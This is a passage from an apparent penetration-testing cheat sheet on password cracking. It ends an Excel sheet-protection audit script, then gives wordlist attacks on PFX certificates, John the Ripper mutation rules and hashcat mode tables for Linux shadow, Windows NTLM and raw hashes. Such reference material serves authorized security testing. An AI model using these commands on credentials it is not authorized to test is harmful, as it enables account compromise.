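            prot = root.find("s:sheetProtection", NS)
            sheets.append({
                "sheet": name,
                "protected": prot is not None,
                "algorithm": prot.get("algorithmName") if prot is not None else None,
                "spin_count": int(prot.get("spinCount", "0")) if prot is not None else None,
                # Every <v> element is a cell value readable without any password.
                "readable_values": len(root.findall(".//s:v", NS)),
            })
    return {"encrypted_container": False, "sheets": sheets}


if __name__ == "__main__":
    report = audit_sheet_protection(build_sample_xlsx())
    print("encrypted container:", report["encrypted_container"])
    for s in report["sheets"]:
        print(s)
```

If confidentiality is the goal, the fix is to save the workbook with a file-open password (which produces the encrypted container this script reports) rather than to rely on sheet protection, which only stops accidental edits.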

PFX Certificates

```bash
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
```

Tools

Hash-identifier

```bash
hash-identifier
> <HASH>
```

John mutation

Read /etc/john/john.conf and configure the rules there.
```bash
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt # Apply all rules
```

Hashcat

```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM"
```

Cracking Linux Hashes - /etc/shadow file

Mode | Hash name | Category
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems

Cracking Windows Hashes

Mode | Hash name | Category
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems

Cracking Common Application Hashes

Mode | Hash name | Category
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
10800 | SHA-384 | Raw Hash
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash